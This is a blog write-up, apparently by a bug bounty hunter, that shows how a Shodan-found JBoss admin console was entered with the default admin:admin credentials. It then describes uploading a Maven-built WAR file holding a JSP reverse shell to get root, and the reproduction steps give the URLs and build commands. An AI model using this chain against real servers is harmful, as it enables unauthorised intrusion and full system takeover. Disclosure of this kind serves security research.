JBOSS :: From Default Creds to RCE

How we got there

Hello guys,

In the world of cybersecurity, uncovering vulnerabilities and exploiting them to gain remote access to a system is a challenge that many ethical hackers undertake. In this blog post, i'll take you through a step-by-step journey of how i found a path to Remote Code Execution (RCE) via a JBoss Admin Panel War File Upload.

The Discovery

It all began with the discovery of an IP address on Shodan, a popular search engine for discovering internet-connected devices and services. I stumbled upon an IP that piqued my interest.

Uncovering the Redirect

Upon further investigation, it became apparent that the IP address in question was associated with a web panel that redirected users to another location. This redirection served as the entry point for my hacking quest.

Default Credentials

The next step was research on JBoss AS (Application Server) instances. Familiarizing myself with JBoss, i uncovered that default credentials were often a weak link. This led to a critical breakthrough - gaining access to the admin panel.

Exploration

With access to the web application's admin panel, I explored the environment to get a feel for its structure, components, and potential vulnerabilities. Panels like this are juicy.

The Quest for Web Shell

The goal was to create a web shell to enable further exploitation. Various methods, including using JSP files and zipped JSP files in War format, were attempted but yielded no results.

A New Approach

Desperate to find a solution, i stumbled upon the idea of creating a Java/JSP web application via Maven. This approach provided a fresh perspective on gaining the desired RCE.

Following the Tutorial

Taking inspiration from a "Hello World" tutorial, i decided to replace the innocuous "Hello World" code with my reverse shell code in a JSP file.

Building the Web App

Using Maven, i built the new JSP web application, incorporating my modified JSP file. This marked a significant step toward my ultimate goal. The next challenge was to upload the newly created War file containing the modified web application to the target server.

Triumph: Remote Code Execution => root

Finally, the moment of truth arrived. After successfully uploading the War file, i achieved my objective – Remote Code Execution (RCE) on the target system. I now had control and access to the server, a remarkable achievement after a series of diligent steps and persistent effort. I was root as the jboss web app was started as root

Reproduction Steps

1. visited webapp at https://xboy.me:8080
2. found the panel was redirecting to xboy.me
3. visited https://xboy.me:8080/admin-console/ and got redirected to https://xboy.me:8080/admin-console/login.seam?conversationId=14
4. entered the default creds admin:admin

5. installed maven and java (lovely tutorial here => https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu )
6. created default hello world example for maven

 mvn archetype:generate -DgroupId=com.example -DartifactId=example-application -DarchetypeArtifactId=maven-archetype-webapp -DinteractiveMode=false

7. replaced the default helloworld code in index.jsp using a malicious one

nano example-application/src/main/webapp/index.jsp

8. Built the web app file via maven to get the correct war file

cd example-application/ && mvn package

9. went back to the panel and uploaded the shell and i was golden
10. ran a few commands and found i was root

Contacts

@github @twitter @LinkedIn @Intigriti @hackerone_old